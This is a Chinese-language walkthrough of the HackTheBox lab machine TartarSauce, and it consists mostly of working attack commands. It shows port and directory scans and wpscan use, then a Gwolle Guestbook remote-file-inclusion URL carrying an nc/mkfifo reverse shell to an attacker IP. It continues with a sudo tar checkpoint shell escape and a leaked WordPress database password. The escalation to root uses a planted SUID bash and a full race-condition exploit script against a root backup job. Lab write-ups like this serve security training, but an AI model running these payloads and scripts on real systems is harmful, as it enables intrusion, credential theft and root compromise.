基本信息

端口扫描

只有80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.10.88
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-30 13:59 CST
Nmap scan report for 10.10.10.88
Host is up (0.067s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.70 seconds

80

首页没什么东西:

目录扫描

robots可以知道webservices,扫描也能发现,继续扫描得到wp:

1
2
3
4
5
6
7
8
9
10
➜  Desktop gobuster dir -u http://10.10.10.88/ -w /usr/share/seclists/Discovery/Web-Content/common.txt  -x php,html,txt -t 50

/index.html (Status: 200) [Size: 10766]
/robots.txt (Status: 200) [Size: 208]
/server-status (Status: 403) [Size: 299]
/webservices (Status: 301) [Size: 316] [--> http://10.10.10.88/webservices/]

➜ Desktop gobuster dir -u http://10.10.10.88/webservices/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

/wp (Status: 301) [Size: 319] [--> http://10.10.10.88/webservices/wp/]

wp是wordprss,显示不正常需要加下hosts:

1
10.10.10.88 tartarsauce.htb

wpscan

Wpscan可以发现老版本插件,默认选项没有发现,可以指定参数,并且当前版本要aggressive模式才能扫到:

1
2
3
wpscan --url http://tartarsauce.htb/webservices/wp/
wpscan --url http://tartarsauce.htb/webservices/wp/ --enumerate p,t,u
wpscan --url http://tartarsauce.htb/webservices/wp --enumerate p --plugins-detection aggressive

Gwolle

这个实际上是1.5.3版本,readme里有说明:

而1.5.3搜到rfi:

RFI webshell

根据log,shell重命令,得到webshell:

reverse shell

1
2
3
http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.11:7777/shell&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.11%204444%20%3E/tmp/f

python -c 'import pty; pty.spawn("/bin/bash")'

onuma

当前www-data可以以onuma身份运行tar:

to onuma

1
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

user flag

onuma用户目录得到user.txt:

提权信息

pspy之类的可以发现backuperer定期以root运行:

1
2
3
4
5
6
7
8
2021/04/30 02:47:11 CMD: UID=0    PID=26084  | /bin/bash /usr/sbin/backuperer

[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/webservices/wp/wp-config.phpdefine('DB_NAME', 'wp');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');
define('DB_HOST', 'localhost');

查看文件内容,流程大概是这样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Backup onuma website dev files.
# 备份/var/www/html到/var/tmp,-z使用gzip
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# sleep 30秒
/bin/sleep 30

# 创建/var/tmp/check 目录
/bin/mkdir $check

# 提取备份文件到check目录
/bin/tar -zxvf $tmpfile -C $check

# 运行integrity_chk函数,检查通过,将备份文件移动到/var/backups/onuma-www-dev.bak,然后删除备份文件,不通过则输出error msg
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}

条件竞争

就是利用sleep的那30秒,在sleep期间解压存档,修改其中的某个文件为软链接,然后重新存档,这样当脚本自动打开存档进行diff的时候,文件不同,会将errormsg包括两个文件的内容写到onuma_backup_error.txt

也可以直接suid文件,sleep的30秒内将suid文件写进去,等他自动解压到check

/usr/sbin/backuperer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi

提权 & root flag

1
2
3
4
5
6
7
8
9
10
11
12
cp /bin/bash .
sudo chown root bash
sudo chmod +xs bash
mkdir -p var/www/html
mv bash var/www/html
tar -zcvf shell.tar.gz var/

# /var/tmp下发现生成后就覆盖
cp /tmp/shell.tar.gz .ce9d5a30bafb9c15cbf4a5b8d77c2b17f3cd1148

# 等解压check,进去执行suid
# 要一个32位的,我复制64的出错,不想再重复了

软链接 get root flag

做软链接去查看报错文件:

exp.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/bin/bash

# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt

参考资料